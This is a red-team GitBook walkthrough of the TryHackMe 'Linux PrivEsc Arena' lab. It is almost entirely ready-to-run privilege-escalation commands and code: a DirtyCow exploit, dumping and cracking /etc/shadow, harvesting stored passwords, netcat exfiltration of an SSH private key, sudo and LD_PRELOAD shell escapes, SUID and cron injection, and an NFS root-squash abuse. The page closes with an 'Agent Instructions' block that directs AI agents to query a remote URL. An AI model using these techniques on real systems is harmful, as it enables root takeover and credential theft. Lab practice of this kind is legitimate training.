# Linux PrivEsc Arena **Room Link:** ## Privilege Escalation - Kernel Exploits In command prompt type: **Victim** ``` /home/user/tools/linux-exploit-suggester/linux-exploit-suggester.sh ``` From the output, notice that the OS is vulnerable to “dirtycow”.

### Exploitation Linux VM In command prompt type: **Victim** ``` gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w ``` In command prompt type: **Victim** ``` ./c0w ``` Disclaimer: This part takes 1-2 minutes - Please allow it some time to work. In command prompt type: **Victim** ``` passwd ``` In command prompt type: **Victim** ``` id ```

From here, either copy /tmp/passwd back to /usr/bin/passwd or reset your machine to undo changes made to the passwd binary **Victim** ``` ls -lah /usr/bin/passwd rm -f /usr/bin/passwd cp /tmp/bak /usr/bin/passwd ls -lah /usr/bin/passwd ```

## Privilege Escalation - Stored Passwords (Config Files) From the output, make note of the value of the “auth-user-pass” directive. **Victim** ``` cat /home/user/myvpn.ovpn ```

From the output, make note of the clear-text credentials. **Victim** ``` cat /etc/openvpn/auth.txt ```

From the output, make note of the clear-text credentials. **Victim** ``` cat /home/user/.irssi/config | grep -i passw ```

## Privilege Escalation - Stored Passwords (History) **Victim** ``` cat ~/.bash_history | grep -i passw ``` From the output, make note of the clear-text credentials.

## Privilege Escalation - Weak File Permissions **Victim** ``` cat /etc/passwd ``` Save the output to a file on your attacker machine

**Victim** ``` cat /etc/shadow ``` Save the output to a file on your attacker machine

**Kali** ``` unshadow passwd shadow > unshadowed.txt hashcat -m 1800 unshadowed.txt rockyou.txt -O ```

## Privilege Escalation - SSH Keys Found nothing for this box **Victim** ``` find / -name authorized_keys 2> /dev/null ``` **Victim** ``` find / -name id_rsa 2> /dev/null cat /backups/supersecretkeys/id_rsa ```

#### Netcat **Kali(receiving)** ``` nc -l -p 1234 > id_rsa ``` **Victim(sending)** ``` nc -w 3 $KALI 1234 < id_rsa ``` **Kali** ``` chmod 400 id_rsa ssh -i id_rsa root@$VICTIM ``` ## Privilege Escalation - Sudo (Shell Escaping) **Victim** ``` sudo -l ```

**Victim** ``` sudo find /bin -name nano -exec /bin/sh \; ```

**Victim** ``` sudo awk 'BEGIN {system("/bin/sh")}' ```

**Victim** ``` echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse ```

**Victim** ``` sudo vim -c '!sh' ```

## Privilege Escalation - Sudo (Abusing Intended Functionality) **Victim** ``` sudo -l ```

**Victim** ``` sudo apache2 -f /etc/shadow ```

**Kali** ``` john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt john hash.txt --show ```

## Privilege Escalation - Sudo (LD\_PRELOAD) **Victim** ``` sudo -l ```

**exploit.c** ``` #include #include #include void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); } ``` **Victim** ``` gcc -fPIC -shared -o /tmp/exploit.so exploit.c -nostartfiles sudo LD_PRELOAD=/tmp/exploit.so apache2 ```

## Privilege Escalation - SUID (Shared Object Injection) **Victim** ``` find / -type f -perm -04000 -ls 2>/dev/null ```

**Victim** ``` strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file" ```

**Victim** ``` mkdir /home/user/.config cd /home/user/.config vi libcalc.c ``` **libcalc.c** ``` #include #include static void inject() __attribute__((constructor)); void inject() { system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); } ``` **Victim** ``` gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c /usr/local/bin/suid-so ```

## Privilege Escalation - SUID (Symlinks) **Victim #1** ``` dpkg -l | grep nginx ```

**Victim #1** ``` su -l www-data ``` **Victim #1** ``` /home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.log ``` **Victim #2** ``` invoke-rc.d nginx rotate >/dev/null 2>&1 ``` **Victim #1** ``` id ```

## Privilege Escalation - SUID (Environment Variables #1) ### Detection **Victim** ``` find / -type f -perm -04000 -ls 2>/dev/null ```

**Victim** ``` strings /usr/local/bin/suid-env ```

### Exploitation **Victim** ``` echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c ``` **Victim** ``` gcc /tmp/service.c -o /tmp/service export PATH=/tmp:$PATH /usr/local/bin/suid-env ``` **Victim** ``` id ```

## Privilege Escalation - SUID (Environment Variables #2) ### Detection **Victim** ``` find / -type f -perm -04000 -ls 2>/dev/null ```

**Victim** ``` /usr/local/bin/suid-env2 ``` ### Exploitation Method #1 **Victim** ``` function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; } ``` **Victim** ``` export -f /usr/sbin/service ``` **Victim** ``` /usr/local/bin/suid-env2 ``` ### Exploitation Method #2 **Victim** ``` env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p' ``` ## Privilege Escalation - Capabilities **Victim** ``` getcap -r / 2>/dev/null ```

**Victim** ``` /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")' ```

## Privilege Escalation - Cron (Path) ### Detection **Victim** ``` cat /etc/crontab ```

### Exploitation **Victim** ``` echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh chmod +x /home/user/overwrite.sh ``` Wait 1 minute for the Bash script to execute. **Victim** ``` /tmp/bash -p id ```

## Privilege Escalation - Cron (Wildcards) ### Detection From the output, notice the script “/usr/local/bin/compress.sh” **Victim** ``` cat /etc/crontab ```

**Victim** ``` cat /usr/local/bin/compress.sh ```

### Exploitation **Victim** ``` echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh ``` **Victim** ``` touch /home/user/--checkpoint=1 touch /home/user/--checkpoint-action=exec=sh\ runme.sh ``` **Victim** ``` /tmp/bash -p id ```

## Privilege Escalation - Cron (File Overwrite) ### Detection From the output, notice the script “overwrite.sh” **Victim** ``` cat /etc/crontab ```

From the output, notice the file permissions. **Victim** ``` ls -l /usr/local/bin/overwrite.sh ```

### Exploitation **Victim** ``` echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh ``` Wait 1 minute for the Bash script to execute. **Victim** ``` /tmp/bash -p id ``` ## Privilege Escalation - NFS Root Squashing ### Detection From the output, notice that “no\_root\_squash” option is defined for the “/tmp” export. **Victim** ``` cat /etc/exports ```

### Exploitation **Kali** ``` showmount -e $VICTIM ```

**Kali** ``` mkdir /tmp/1 mount -o rw,vers=2 10.10.26.171:/tmp /tmp/1 ``` **Kali** ``` echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c ``` **Kali** ``` gcc /tmp/1/x.c -o /tmp/1/x chmod +s /tmp/1/x ``` **Victim** ``` /tmp/x id ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc-arena.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.